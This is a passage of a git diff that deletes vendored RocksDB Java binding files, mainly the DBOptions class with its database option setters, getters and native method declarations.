-      if (compressionType.getValue() == byteIdentifier) {
-        return compressionType;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for CompressionType.");
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  /**
-   * <p>Returns the library name of the compression type
-   * identified by the enumeration value.</p>
-   *
-   * @return library name
-   */
-  public String getLibraryName() {
-    return libraryName_;
-  }
-
-  CompressionType(final byte value, final String libraryName) {
-    value_ = value;
-    libraryName_ = libraryName;
-  }
-
-  private final byte value_;
-  private final String libraryName_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java
deleted file mode 100644
index 14f0c6c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DBOptions.java
+++ /dev/null
@@ -1,1120 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Paths;
-import java.util.*;
-
-/**
- * DBOptions to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automatically and native resources will be released as part of the process.
- */
-public class DBOptions
-    extends RocksObject implements DBOptionsInterface<DBOptions> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct DBOptions.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::DBOptions} in the c++ side.
-   */
-  public DBOptions() {
-    super(newDBOptions());
-    numShardBits_ = DEFAULT_NUM_SHARD_BITS;
-  }
-
-  /**
-   * <p>Method to get a options instance by using pre-configured
-   * property values. If one or many values are undefined in
-   * the context of RocksDB the method will return a null
-   * value.</p>
-   *
-   * <p><strong>Note</strong>: Property keys can be derived from
-   * getter methods within the options class. Example: the method
-   * {@code allowMmapReads()} has a property key:
-   * {@code allow_mmap_reads}.</p>
-   *
-   * @param properties {@link java.util.Properties} instance.
-   *
-   * @return {@link org.rocksdb.DBOptions instance}
-   *     or null.
-   *
-   * @throws java.lang.IllegalArgumentException if null or empty
-   *     {@link java.util.Properties} instance is passed to the method call.
-   */
-  public static DBOptions getDBOptionsFromProps(
-      final Properties properties) {
-    if (properties == null || properties.size() == 0) {
-      throw new IllegalArgumentException(
-          "Properties value must contain at least one value.");
-    }
-    DBOptions dbOptions = null;
-    StringBuilder stringBuilder = new StringBuilder();
-    for (final String name : properties.stringPropertyNames()){
-      stringBuilder.append(name);
-      stringBuilder.append("=");
-      stringBuilder.append(properties.getProperty(name));
-      stringBuilder.append(";");
-    }
-    long handle = getDBOptionsFromProps(
-        stringBuilder.toString());
-    if (handle != 0){
-      dbOptions = new DBOptions(handle);
-    }
-    return dbOptions;
-  }
-
-  @Override
-  public DBOptions optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setIncreaseParallelism(
-      final int totalThreads) {
-    assert(isOwningHandle());
-    setIncreaseParallelism(nativeHandle_, totalThreads);
-    return this;
-  }
-
-  @Override
-  public DBOptions setCreateIfMissing(final boolean flag) {
-    assert(isOwningHandle());
-    setCreateIfMissing(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public boolean createIfMissing() {
-    assert(isOwningHandle());
-    return createIfMissing(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setCreateMissingColumnFamilies(
-      final boolean flag) {
-    assert(isOwningHandle());
-    setCreateMissingColumnFamilies(nativeHandle_, flag);
-    return this;
-  }
-
-  @Override
-  public boolean createMissingColumnFamilies() {
-    assert(isOwningHandle());
-    return createMissingColumnFamilies(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnv(final Env env) {
-    setEnv(nativeHandle_, env.nativeHandle_);
-    this.env_ = env;
-    return this;
-  }
-
-  @Override
-  public Env getEnv() {
-    return env_;
-  }
-
-  @Override
-  public DBOptions setErrorIfExists(
-      final boolean errorIfExists) {
-    assert(isOwningHandle());
-    setErrorIfExists(nativeHandle_, errorIfExists);
-    return this;
-  }
-
-  @Override
-  public boolean errorIfExists() {
-    assert(isOwningHandle());
-    return errorIfExists(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setParanoidChecks(
-      final boolean paranoidChecks) {
-    assert(isOwningHandle());
-    setParanoidChecks(nativeHandle_, paranoidChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidChecks() {
-    assert(isOwningHandle());
-    return paranoidChecks(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRateLimiter(final RateLimiter rateLimiter) {
-    assert(isOwningHandle());
-    rateLimiter_ = rateLimiter;
-    setRateLimiter(nativeHandle_, rateLimiter.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setLogger(final Logger logger) {
-    assert(isOwningHandle());
-    setLogger(nativeHandle_, logger.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public DBOptions setInfoLogLevel(
-      final InfoLogLevel infoLogLevel) {
-    assert(isOwningHandle());
-    setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-    return this;
-  }
-
-  @Override
-  public InfoLogLevel infoLogLevel() {
-    assert(isOwningHandle());
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setMaxOpenFiles(
-      final int maxOpenFiles) {
-    assert(isOwningHandle());
-    setMaxOpenFiles(nativeHandle_, maxOpenFiles);
-    return this;
-  }
-
-  @Override
-  public int maxOpenFiles() {
-    assert(isOwningHandle());
-    return maxOpenFiles(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxFileOpeningThreads(final int maxFileOpeningThreads) {
-    assert(isOwningHandle());
-    setMaxFileOpeningThreads(nativeHandle_, maxFileOpeningThreads);
-    return this;
-  }
-
-  @Override
-  public int maxFileOpeningThreads() {
-    assert(isOwningHandle());
-    return maxFileOpeningThreads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxTotalWalSize(
-      final long maxTotalWalSize) {
-    assert(isOwningHandle());
-    setMaxTotalWalSize(nativeHandle_, maxTotalWalSize);
-    return this;
-  }
-
-  @Override
-  public long maxTotalWalSize() {
-    assert(isOwningHandle());
-    return maxTotalWalSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setStatistics(final Statistics statistics) {
-    assert(isOwningHandle());
-    setStatistics(nativeHandle_, statistics.nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public Statistics statistics() {
-    assert(isOwningHandle());
-    final long statisticsNativeHandle = statistics(nativeHandle_);
-    if(statisticsNativeHandle == 0) {
-      return null;
-    } else {
-      return new Statistics(statisticsNativeHandle);
-    }
-  }
-
-  @Override
-  public DBOptions setUseFsync(
-      final boolean useFsync) {
-    assert(isOwningHandle());
-    setUseFsync(nativeHandle_, useFsync);
-    return this;
-  }
-
-  @Override
-  public boolean useFsync() {
-    assert(isOwningHandle());
-    return useFsync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDbPaths(final Collection<DbPath> dbPaths) {
-    assert(isOwningHandle());
-
-    final int len = dbPaths.size();
-    final String paths[] = new String[len];
-    final long targetSizes[] = new long[len];
-
-    int i = 0;
-    for(final DbPath dbPath : dbPaths) {
-      paths[i] = dbPath.path.toString();
-      targetSizes[i] = dbPath.targetSize;
-      i++;
-    }
-    setDbPaths(nativeHandle_, paths, targetSizes);
-    return this;
-  }
-
-  @Override
-  public List<DbPath> dbPaths() {
-    final int len = (int)dbPathsLen(nativeHandle_);
-    if(len == 0) {
-      return Collections.emptyList();
-    } else {
-      final String paths[] = new String[len];
-      final long targetSizes[] = new long[len];
-
-      dbPaths(nativeHandle_, paths, targetSizes);
-
-      final List<DbPath> dbPaths = new ArrayList<>();
-      for(int i = 0; i < len; i++) {
-        dbPaths.add(new DbPath(Paths.get(paths[i]), targetSizes[i]));
-      }
-      return dbPaths;
-    }
-  }
-
-  @Override
-  public DBOptions setDbLogDir(
-      final String dbLogDir) {
-    assert(isOwningHandle());
-    setDbLogDir(nativeHandle_, dbLogDir);
-    return this;
-  }
-
-  @Override
-  public String dbLogDir() {
-    assert(isOwningHandle());
-    return dbLogDir(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalDir(
-      final String walDir) {
-    assert(isOwningHandle());
-    setWalDir(nativeHandle_, walDir);
-    return this;
-  }
-
-  @Override
-  public String walDir() {
-    assert(isOwningHandle());
-    return walDir(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDeleteObsoleteFilesPeriodMicros(
-      final long micros) {
-    assert(isOwningHandle());
-    setDeleteObsoleteFilesPeriodMicros(nativeHandle_, micros);
-    return this;
-  }
-
-  @Override
-  public long deleteObsoleteFilesPeriodMicros() {
-    assert(isOwningHandle());
-    return deleteObsoleteFilesPeriodMicros(nativeHandle_);
-  }
-
-  @Override
-  public void setBaseBackgroundCompactions(
-      final int baseBackgroundCompactions) {
-    assert(isOwningHandle());
-    setBaseBackgroundCompactions(nativeHandle_, baseBackgroundCompactions);
-  }
-
-  @Override
-  public int baseBackgroundCompactions() {
-    assert(isOwningHandle());
-    return baseBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxBackgroundCompactions(
-      final int maxBackgroundCompactions) {
-    assert(isOwningHandle());
-    setMaxBackgroundCompactions(nativeHandle_, maxBackgroundCompactions);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundCompactions() {
-    assert(isOwningHandle());
-    return maxBackgroundCompactions(nativeHandle_);
-  }
-
-  @Override
-  public void setMaxSubcompactions(final int maxSubcompactions) {
-    assert(isOwningHandle());
-    setMaxSubcompactions(nativeHandle_, maxSubcompactions);
-  }
-
-  @Override
-  public int maxSubcompactions() {
-    assert(isOwningHandle());
-    return maxSubcompactions(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxBackgroundFlushes(
-      final int maxBackgroundFlushes) {
-    assert(isOwningHandle());
-    setMaxBackgroundFlushes(nativeHandle_, maxBackgroundFlushes);
-    return this;
-  }
-
-  @Override
-  public int maxBackgroundFlushes() {
-    assert(isOwningHandle());
-    return maxBackgroundFlushes(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxLogFileSize(
-      final long maxLogFileSize) {
-    assert(isOwningHandle());
-    setMaxLogFileSize(nativeHandle_, maxLogFileSize);
-    return this;
-  }
-
-  @Override
-  public long maxLogFileSize() {
-    assert(isOwningHandle());
-    return maxLogFileSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setLogFileTimeToRoll(
-      final long logFileTimeToRoll) {
-    assert(isOwningHandle());
-    setLogFileTimeToRoll(nativeHandle_, logFileTimeToRoll);
-    return this;
-  }
-
-  @Override
-  public long logFileTimeToRoll() {
-    assert(isOwningHandle());
-    return logFileTimeToRoll(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setKeepLogFileNum(
-      final long keepLogFileNum) {
-    assert(isOwningHandle());
-    setKeepLogFileNum(nativeHandle_, keepLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long keepLogFileNum() {
-    assert(isOwningHandle());
-    return keepLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRecycleLogFileNum(final long recycleLogFileNum) {
-    assert(isOwningHandle());
-    setRecycleLogFileNum(nativeHandle_, recycleLogFileNum);
-    return this;
-  }
-
-  @Override
-  public long recycleLogFileNum() {
-    assert(isOwningHandle());
-    return recycleLogFileNum(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setMaxManifestFileSize(
-      final long maxManifestFileSize) {
-    assert(isOwningHandle());
-    setMaxManifestFileSize(nativeHandle_, maxManifestFileSize);
-    return this;
-  }
-
-  @Override
-  public long maxManifestFileSize() {
-    assert(isOwningHandle());
-    return maxManifestFileSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setTableCacheNumshardbits(
-      final int tableCacheNumshardbits) {
-    assert(isOwningHandle());
-    setTableCacheNumshardbits(nativeHandle_, tableCacheNumshardbits);
-    return this;
-  }
-
-  @Override
-  public int tableCacheNumshardbits() {
-    assert(isOwningHandle());
-    return tableCacheNumshardbits(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalTtlSeconds(
-      final long walTtlSeconds) {
-    assert(isOwningHandle());
-    setWalTtlSeconds(nativeHandle_, walTtlSeconds);
-    return this;
-  }
-
-  @Override
-  public long walTtlSeconds() {
-    assert(isOwningHandle());
-    return walTtlSeconds(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalSizeLimitMB(
-      final long sizeLimitMB) {
-    assert(isOwningHandle());
-    setWalSizeLimitMB(nativeHandle_, sizeLimitMB);
-    return this;
-  }
-
-  @Override
-  public long walSizeLimitMB() {
-    assert(isOwningHandle());
-    return walSizeLimitMB(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setManifestPreallocationSize(
-      final long size) {
-    assert(isOwningHandle());
-    setManifestPreallocationSize(nativeHandle_, size);
-    return this;
-  }
-
-  @Override
-  public long manifestPreallocationSize() {
-    assert(isOwningHandle());
-    return manifestPreallocationSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseDirectReads(
-      final boolean useDirectReads) {
-    assert(isOwningHandle());
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseDirectIoForFlushAndCompaction(
-      final boolean useDirectIoForFlushAndCompaction) {
-    assert(isOwningHandle());
-    setUseDirectIoForFlushAndCompaction(nativeHandle_,
-        useDirectIoForFlushAndCompaction);
-    return this;
-  }
-
-  @Override
-  public boolean useDirectIoForFlushAndCompaction() {
-    assert(isOwningHandle());
-    return useDirectIoForFlushAndCompaction(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowFAllocate(final boolean allowFAllocate) {
-    assert(isOwningHandle());
-    setAllowFAllocate(nativeHandle_, allowFAllocate);
-    return this;
-  }
-
-  @Override
-  public boolean allowFAllocate() {
-    assert(isOwningHandle());
-    return allowFAllocate(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowMmapReads(
-      final boolean allowMmapReads) {
-    assert(isOwningHandle());
-    setAllowMmapReads(nativeHandle_, allowMmapReads);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapReads() {
-    assert(isOwningHandle());
-    return allowMmapReads(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowMmapWrites(
-      final boolean allowMmapWrites) {
-    assert(isOwningHandle());
-    setAllowMmapWrites(nativeHandle_, allowMmapWrites);
-    return this;
-  }
-
-  @Override
-  public boolean allowMmapWrites() {
-    assert(isOwningHandle());
-    return allowMmapWrites(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setIsFdCloseOnExec(
-      final boolean isFdCloseOnExec) {
-    assert(isOwningHandle());
-    setIsFdCloseOnExec(nativeHandle_, isFdCloseOnExec);
-    return this;
-  }
-
-  @Override
-  public boolean isFdCloseOnExec() {
-    assert(isOwningHandle());
-    return isFdCloseOnExec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setStatsDumpPeriodSec(
-      final int statsDumpPeriodSec) {
-    assert(isOwningHandle());
-    setStatsDumpPeriodSec(nativeHandle_, statsDumpPeriodSec);
-    return this;
-  }
-
-  @Override
-  public int statsDumpPeriodSec() {
-    assert(isOwningHandle());
-    return statsDumpPeriodSec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAdviseRandomOnOpen(
-      final boolean adviseRandomOnOpen) {
-    assert(isOwningHandle());
-    setAdviseRandomOnOpen(nativeHandle_, adviseRandomOnOpen);
-    return this;
-  }
-
-  @Override
-  public boolean adviseRandomOnOpen() {
-    return adviseRandomOnOpen(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDbWriteBufferSize(final long dbWriteBufferSize) {
-    assert(isOwningHandle());
-    setDbWriteBufferSize(nativeHandle_, dbWriteBufferSize);
-    return this;
-  }
-
-  @Override
-  public long dbWriteBufferSize() {
-    assert(isOwningHandle());
-    return dbWriteBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAccessHintOnCompactionStart(final AccessHint accessHint) {
-    assert(isOwningHandle());
-    setAccessHintOnCompactionStart(nativeHandle_, accessHint.getValue());
-    return this;
-  }
-
-  @Override
-  public AccessHint accessHintOnCompactionStart() {
-    assert(isOwningHandle());
-    return AccessHint.getAccessHint(accessHintOnCompactionStart(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setNewTableReaderForCompactionInputs(
-      final boolean newTableReaderForCompactionInputs) {
-    assert(isOwningHandle());
-    setNewTableReaderForCompactionInputs(nativeHandle_,
-        newTableReaderForCompactionInputs);
-    return this;
-  }
-
-  @Override
-  public boolean newTableReaderForCompactionInputs() {
-    assert(isOwningHandle());
-    return newTableReaderForCompactionInputs(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    assert(isOwningHandle());
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
-  @Override
-  public long compactionReadaheadSize() {
-    assert(isOwningHandle());
-    return compactionReadaheadSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRandomAccessMaxBufferSize(final long randomAccessMaxBufferSize) {
-    assert(isOwningHandle());
-    setRandomAccessMaxBufferSize(nativeHandle_, randomAccessMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long randomAccessMaxBufferSize() {
-    assert(isOwningHandle());
-    return randomAccessMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWritableFileMaxBufferSize(final long writableFileMaxBufferSize) {
-    assert(isOwningHandle());
-    setWritableFileMaxBufferSize(nativeHandle_, writableFileMaxBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writableFileMaxBufferSize() {
-    assert(isOwningHandle());
-    return writableFileMaxBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setUseAdaptiveMutex(
-      final boolean useAdaptiveMutex) {
-    assert(isOwningHandle());
-    setUseAdaptiveMutex(nativeHandle_, useAdaptiveMutex);
-    return this;
-  }
-
-  @Override
-  public boolean useAdaptiveMutex() {
-    assert(isOwningHandle());
-    return useAdaptiveMutex(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setBytesPerSync(
-      final long bytesPerSync) {
-    assert(isOwningHandle());
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long bytesPerSync() {
-    return bytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalBytesPerSync(final long walBytesPerSync) {
-    assert(isOwningHandle());
-    setWalBytesPerSync(nativeHandle_, walBytesPerSync);
-    return this;
-  }
-
-  @Override
-  public long walBytesPerSync() {
-    assert(isOwningHandle());
-    return walBytesPerSync(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnableThreadTracking(final boolean enableThreadTracking) {
-    assert(isOwningHandle());
-    setEnableThreadTracking(nativeHandle_, enableThreadTracking);
-    return this;
-  }
-
-  @Override
-  public boolean enableThreadTracking() {
-    assert(isOwningHandle());
-    return enableThreadTracking(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDelayedWriteRate(final long delayedWriteRate) {
-    assert(isOwningHandle());
-    setDelayedWriteRate(nativeHandle_, delayedWriteRate);
-    return this;
-  }
-
-  @Override
-  public long delayedWriteRate(){
-    return delayedWriteRate(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAllowConcurrentMemtableWrite(
-      final boolean allowConcurrentMemtableWrite) {
-    setAllowConcurrentMemtableWrite(nativeHandle_,
-        allowConcurrentMemtableWrite);
-    return this;
-  }
-
-  @Override
-  public boolean allowConcurrentMemtableWrite() {
-    return allowConcurrentMemtableWrite(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setEnableWriteThreadAdaptiveYield(
-      final boolean enableWriteThreadAdaptiveYield) {
-    setEnableWriteThreadAdaptiveYield(nativeHandle_,
-        enableWriteThreadAdaptiveYield);
-    return this;
-  }
-
-  @Override
-  public boolean enableWriteThreadAdaptiveYield() {
-    return enableWriteThreadAdaptiveYield(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWriteThreadMaxYieldUsec(final long writeThreadMaxYieldUsec) {
-    setWriteThreadMaxYieldUsec(nativeHandle_, writeThreadMaxYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadMaxYieldUsec() {
-    return writeThreadMaxYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWriteThreadSlowYieldUsec(final long writeThreadSlowYieldUsec) {
-    setWriteThreadSlowYieldUsec(nativeHandle_, writeThreadSlowYieldUsec);
-    return this;
-  }
-
-  @Override
-  public long writeThreadSlowYieldUsec() {
-    return writeThreadSlowYieldUsec(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setSkipStatsUpdateOnDbOpen(final boolean skipStatsUpdateOnDbOpen) {
-    assert(isOwningHandle());
-    setSkipStatsUpdateOnDbOpen(nativeHandle_, skipStatsUpdateOnDbOpen);
-    return this;
-  }
-
-  @Override
-  public boolean skipStatsUpdateOnDbOpen() {
-    assert(isOwningHandle());
-    return skipStatsUpdateOnDbOpen(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setWalRecoveryMode(final WALRecoveryMode walRecoveryMode) {
-    assert(isOwningHandle());
-    setWalRecoveryMode(nativeHandle_, walRecoveryMode.getValue());
-    return this;
-  }
-
-  @Override
-  public WALRecoveryMode walRecoveryMode() {
-    assert(isOwningHandle());
-    return WALRecoveryMode.getWALRecoveryMode(walRecoveryMode(nativeHandle_));
-  }
-
-  @Override
-  public DBOptions setAllow2pc(final boolean allow2pc) {
-    assert(isOwningHandle());
-    setAllow2pc(nativeHandle_, allow2pc);
-    return this;
-  }
-
-  @Override
-  public boolean allow2pc() {
-    assert(isOwningHandle());
-    return allow2pc(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setRowCache(final Cache rowCache) {
-    assert(isOwningHandle());
-    setRowCache(nativeHandle_, rowCache.nativeHandle_);
-    this.rowCache_ = rowCache;
-    return this;
-  }
-
-  @Override
-  public Cache rowCache() {
-    assert(isOwningHandle());
-    return this.rowCache_;
-  }
-
-  @Override
-  public DBOptions setFailIfOptionsFileError(final boolean failIfOptionsFileError) {
-    assert(isOwningHandle());
-    setFailIfOptionsFileError(nativeHandle_, failIfOptionsFileError);
-    return this;
-  }
-
-  @Override
-  public boolean failIfOptionsFileError() {
-    assert(isOwningHandle());
-    return failIfOptionsFileError(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setDumpMallocStats(final boolean dumpMallocStats) {
-    assert(isOwningHandle());
-    setDumpMallocStats(nativeHandle_, dumpMallocStats);
-    return this;
-  }
-
-  @Override
-  public boolean dumpMallocStats() {
-    assert(isOwningHandle());
-    return dumpMallocStats(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAvoidFlushDuringRecovery(final boolean avoidFlushDuringRecovery) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringRecovery(nativeHandle_, avoidFlushDuringRecovery);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringRecovery() {
-    assert(isOwningHandle());
-    return avoidFlushDuringRecovery(nativeHandle_);
-  }
-
-  @Override
-  public DBOptions setAvoidFlushDuringShutdown(final boolean avoidFlushDuringShutdown) {
-    assert(isOwningHandle());
-    setAvoidFlushDuringShutdown(nativeHandle_, avoidFlushDuringShutdown);
-    return this;
-  }
-
-  @Override
-  public boolean avoidFlushDuringShutdown() {
-    assert(isOwningHandle());
-    return avoidFlushDuringShutdown(nativeHandle_);
-  }
-
-  static final int DEFAULT_NUM_SHARD_BITS = -1;
-
-
-
-
-  /**
-   * <p>Private constructor to be used by
-   * {@link #getDBOptionsFromProps(java.util.Properties)}</p>
-   *
-   * @param nativeHandle native handle to DBOptions instance.
-   */
-  private DBOptions(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  private static native long getDBOptionsFromProps(
-      String optString);
-
-  private native static long newDBOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void optimizeForSmallDb(final long handle);
-  private native void setIncreaseParallelism(long handle, int totalThreads);
-  private native void setCreateIfMissing(long handle, boolean flag);
-  private native boolean createIfMissing(long handle);
-  private native void setCreateMissingColumnFamilies(
-      long handle, boolean flag);
-  private native boolean createMissingColumnFamilies(long handle);
-  private native void setEnv(long handle, long envHandle);
-  private native void setErrorIfExists(long handle, boolean errorIfExists);
-  private native boolean errorIfExists(long handle);
-  private native void setParanoidChecks(
-      long handle, boolean paranoidChecks);
-  private native boolean paranoidChecks(long handle);
-  private native void setRateLimiter(long handle,
-      long rateLimiterHandle);
-  private native void setLogger(long handle,
-      long loggerHandle);
-  private native void setInfoLogLevel(long handle, byte logLevel);
-  private native byte infoLogLevel(long handle);
-  private native void setMaxOpenFiles(long handle, int maxOpenFiles);
-  private native int maxOpenFiles(long handle);
-  private native void setMaxFileOpeningThreads(final long handle,
-      final int maxFileOpeningThreads);
-  private native int maxFileOpeningThreads(final long handle);
-  private native void setMaxTotalWalSize(long handle,
-      long maxTotalWalSize);
-  private native long maxTotalWalSize(long handle);
-  private native void setStatistics(final long handle, final long statisticsHandle);
-  private native long statistics(final long handle);
-  private native boolean useFsync(long handle);
-  private native void setUseFsync(long handle, boolean useFsync);
-  private native void setDbPaths(final long handle, final String[] paths,
-      final long[] targetSizes);
-  private native long dbPathsLen(final long handle);
-  private native void dbPaths(final long handle, final String[] paths,
-                                 final long[] targetSizes);
-  private native void setDbLogDir(long handle, String dbLogDir);
-  private native String dbLogDir(long handle);
-  private native void setWalDir(long handle, String walDir);
-  private native String walDir(long handle);
-  private native void setDeleteObsoleteFilesPeriodMicros(
-      long handle, long micros);
-  private native long deleteObsoleteFilesPeriodMicros(long handle);
-  private native void setBaseBackgroundCompactions(long handle,
-      int baseBackgroundCompactions);
-  private native int baseBackgroundCompactions(long handle);
-  private native void setMaxBackgroundCompactions(
-      long handle, int maxBackgroundCompactions);
-  private native int maxBackgroundCompactions(long handle);
-  private native void setMaxSubcompactions(long handle, int maxSubcompactions);
-  private native int maxSubcompactions(long handle);
-  private native void setMaxBackgroundFlushes(
-      long handle, int maxBackgroundFlushes);
-  private native int maxBackgroundFlushes(long handle);
-  private native void setMaxLogFileSize(long handle, long maxLogFileSize)
-      throws IllegalArgumentException;
-  private native long maxLogFileSize(long handle);
-  private native void setLogFileTimeToRoll(
-      long handle, long logFileTimeToRoll) throws IllegalArgumentException;
-  private native long logFileTimeToRoll(long handle);
-  private native void setKeepLogFileNum(long handle, long keepLogFileNum)
-      throws IllegalArgumentException;
-  private native long keepLogFileNum(long handle);
-  private native void setRecycleLogFileNum(long handle, long recycleLogFileNum);
-  private native long recycleLogFileNum(long handle);
-  private native void setMaxManifestFileSize(
-      long handle, long maxManifestFileSize);
-  private native long maxManifestFileSize(long handle);
-  private native void setTableCacheNumshardbits(
-      long handle, int tableCacheNumshardbits);
-  private native int tableCacheNumshardbits(long handle);
-  private native void setWalTtlSeconds(long handle, long walTtlSeconds);
-  private native long walTtlSeconds(long handle);
-  private native void setWalSizeLimitMB(long handle, long sizeLimitMB);
-  private native long walSizeLimitMB(long handle);
-  private native void setManifestPreallocationSize(
-      long handle, long size) throws IllegalArgumentException;
-  private native long manifestPreallocationSize(long handle);
-  private native void setUseDirectReads(long handle, boolean useDirectReads);
-  private native boolean useDirectReads(long handle);
-  private native void setUseDirectIoForFlushAndCompaction(
-      long handle, boolean useDirectIoForFlushAndCompaction);
-  private native boolean useDirectIoForFlushAndCompaction(long handle);
-  private native void setAllowFAllocate(final long handle,
-      final boolean allowFAllocate);
-  private native boolean allowFAllocate(final long handle);
-  private native void setAllowMmapReads(
-      long handle, boolean allowMmapReads);
-  private native boolean allowMmapReads(long handle);
-  private native void setAllowMmapWrites(
-      long handle, boolean allowMmapWrites);
-  private native boolean allowMmapWrites(long handle);
-  private native void setIsFdCloseOnExec(
-      long handle, boolean isFdCloseOnExec);
-  private native boolean isFdCloseOnExec(long handle);
-  private native void setStatsDumpPeriodSec(
-      long handle, int statsDumpPeriodSec);
-  private native int statsDumpPeriodSec(long handle);
-  private native void setAdviseRandomOnOpen(
-      long handle, boolean adviseRandomOnOpen);
-  private native boolean adviseRandomOnOpen(long handle);
-  private native void setDbWriteBufferSize(final long handle,
-      final long dbWriteBufferSize);
-  private native long dbWriteBufferSize(final long handle);
-  private native void setAccessHintOnCompactionStart(final long handle,
-      final byte accessHintOnCompactionStart);
-  private native byte accessHintOnCompactionStart(final long handle);
-  private native void setNewTableReaderForCompactionInputs(final long handle,
-      final boolean newTableReaderForCompactionInputs);
-  private native boolean newTableReaderForCompactionInputs(final long handle);
-  private native void setCompactionReadaheadSize(final long handle,
-      final long compactionReadaheadSize);
-  private native long compactionReadaheadSize(final long handle);
-  private native void setRandomAccessMaxBufferSize(final long handle,
-      final long randomAccessMaxBufferSize);
-  private native long randomAccessMaxBufferSize(final long handle);
-  private native void setWritableFileMaxBufferSize(final long handle,
-      final long writableFileMaxBufferSize);
-  private native long writableFileMaxBufferSize(final long handle);
-  private native void setUseAdaptiveMutex(
-      long handle, boolean useAdaptiveMutex);
-  private native boolean useAdaptiveMutex(long handle);
-  private native void setBytesPerSync(
-      long handle, long bytesPerSync);
-  private native long bytesPerSync(long handle);
-  private native void setWalBytesPerSync(long handle, long walBytesPerSync);
